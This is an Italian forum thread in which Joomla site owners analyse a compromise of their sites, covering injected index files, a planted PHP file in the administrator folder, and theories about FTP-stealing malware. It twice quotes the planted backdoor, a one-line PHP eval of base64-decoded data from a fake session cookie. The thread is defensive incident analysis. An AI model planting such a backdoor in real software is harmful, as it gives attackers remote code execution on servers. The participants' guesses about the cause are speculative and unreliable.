e ci sono anch'ioooo!

[mau_develop]

sostanzialmente iniettano tutte le index.html all'interno delle dir di primo livello, gli altri no.

Nemma cartella administrator mettono un malcheck.php e iniettano tutti e tregli index.. o due nn ricordo, e così pure quelli di primo livello

Log del server spazzati.

Accesso come user per esploitare assolutamente no, o almeno non si è allertato nulla.

Nella cache nulla

php 5.2.13

Accesso impossibile da ftp, si accede solo dal cpanel dell'hosting e da li si riesce ad amministrare.

Aperto ticket.

... sono riuscito a scaricare il codice e adesso vado un po a vedere se riesco a scaricare il virus.

Ovviamente mi aspetto che risucceda, e cmq direi che il passaggio è al 90% il server e non joomla; ovvero lo stesso gioco della precedente vulnerabilità del php: si attacca un sito debole e da quello si spalmano script su tutti i siti del server.

M.

PS CONTROLLATE A MANINA LE INDEX non fidatevi di non venire allertati dal browser.

Controllato il db... intatto

controllate le password admin .. tutto a posto

secondo me sono già al 95% di sicurezza che il problema è il server e il php.

Il fatto di non avere accesso ftp mi sa che vuol dire che è riuscito a compromettere pure il server, altrimenti se qualcuno ha idee in merito...

Potete fare dei check con qs tool
http://linkscanner.explabs.com/

[mau_develop]

scusate se mi uppo, ma il mio 95% era a scopo di precauzione.

stavo esaminando il codice iniettato:
se volete eseguire del js senza paura in locale basta modificare la function dello script con un document.write al posto dell'azione scelta dall'attacker.

Edit: questo è spiegato abbastanza bene qui:

http://www.capn3m0.org/hack-cannot-redeclare-security_update.html


nel file mailcheck.php l'altra conferma:

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

..grab dei cookies di sessione....

mi sa che il problema sta in joomla e non nell'hosting....

M.

[ariess]

grazie della segnalazione mau_develop.
se si tratta di una falla di joomla mi sembra un problema interessante.
tu che sei un guru della sicurezza tienici informati.

ciao
riccardo

[ramses_2th]

Ciao mau_develop sono piu' di 2 mesi che vanno avanti questi attacchi ( sono stato colpito su 8 siti, con 5 hosting diversi, anche siti vuoti dove era presente solo un index).

Nessuno degli hosting ha risposto alle mie richieste di spiegazioni (anche grossi nomi come Tiscali e BT) 

[mau_develop]

maperchecaxo non riesco ad accedere con l'ftp dalla mia macchina?

Possibile che l'hoster con il server davanti non riesca a vedere nulla di strano?

M.

Non riesco a capire il senso di un po' di cose:
hanno iniettato un grabber di sessione per l'admin, quello deve essere per forza un punto di partenza, se avessero già un'accesso fisico cosa cavolo servirebbe?

Tento quindi di andare indietro da questo punto, che ci fa un file .php nella cartella administrator?
Perchè proprio in administrator?
- Perchè lì entra solo chi amministra, altrimenti si ritroverebbero un fiume di righe

Come ce l'hanno messo non avendo accesso fisico?
... due strade:
- me lo sono messo io con un CSRF, ovvero, mentre ero admin ho cliccato qualcosa che ha compiuto quell'azione

- un flawn di php permette da uno spazio qualsiasi sul server di copiare file in altre directory skippando bellamente il base dir

il js credo sia il lore vero obbiettivo, redirigere verso siti malevoli.

@ricdata
tu che sei un guru della sicurezza tienici informati.
----------------------------------------------------
magari..., sono solo un maledetto curioso, quelli che faticano a dormire se hanno qualcosa che gli gira per la testa
Il resto è un misto di testa/gambe, vorrei prevalesse sempre la testa però non si può sapere sempre tutto di tutto.

Quello che mi meraviglia molto è che non se ne parli in nessuna comunità di security, sono mesi che va avanti questa cosa... e assomiglia maledettamente al problema del symlink che aveva php, anzi, se non fosse che ormai è patchato direi che la strada sembra quella.

... continuo ad essere convinto della bontà di joomla, se fosse stata una sqlinj non avrebbe avuto senso mettere un grab di sessione.

Deve essere come minimo una vulnerabilità RFI o CSRF, la prima .. boh.. non mi sembra ci sia, la seconda l'ho trovata solo sui form mail.

[ramses_2th]

Io non ho avuto nessun problema con l'ftp, ho ripulito gli index dal codice malevolo, che ha in qualche caso superato anche la barriera della root.

[mau_develop]

no aspè... vedi che son fuori...

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

questo non è un grabber, è l'exploit !

ovvero, $_COOKIE["PHPSESSIID"] mi sembra non esiste in Joomla, esiste PHPSESSID...

quindi attraverso un codice inserito in un cookie quando arrivi in admin viene esploitato da quello script.

M.

EDIT: CREDO non centra nulla joomla e non centra nulla l'hoster
credo sia un virus che colpisce l'ftp e quel files php ve lo scrivete voi, poi viene esploitato all'occorrenza.

LINUX non ne è immune.
Scaricatevi un chkrootkit o un rkhunter e provate

Chi ha windows consiglio bitdefender live, da far partire come distro live.

M.

M.

[mau_develop]

Ho bisogno di alcune conferme:

- mailcheck.php ha un time di ultima modifica diverso dagli index che invece hanno tutti lo stesso time.

- Il time di mailcheck o degli index può corrispondere ad un vostro accesso in admin

- Avete fatto un'approfondita scansione antivirus o controllato con uno sniffer che pacchetti partono e verso dove quando usate filezilla o simile.

- Potete aver navigato con Firefox mentre eravate loggati come admin

- Le password e i vari servizi non sono stati modificati

... scusate ma sto tirando un po' di somme.

Avviso ancora i possessori di LINUX ... 24 rootkit ho trovato... qualcuno non poteva funzionare, qualcuno era il solito falso positivo, ma qualcun'altro era riuscito a passare e creare dei device.

M.

[ramses_2th]

Belle domande .... adesso non ricordo, ma una cosa è certa .... tutti i siti colpiti, avevano in comune la data e l'orario degli index.

[mau_develop]

... mmhhh mi sa che ho ragione, o sono un caso particolare...
Non accedo all'ftp poichè ho allertato il loro firewall quando continuavo ad accedere per capire, guardare cosa si vedeva dall'esterno, modificare etc.

Devo trovare il modo di capire se l'infezione avviene dopo o è la causa di tutto, una differenza tra le date dei files poteva essere un'indizio, purtroppo quando li ho aperto li ho modificati senza pensarci..

M.

M.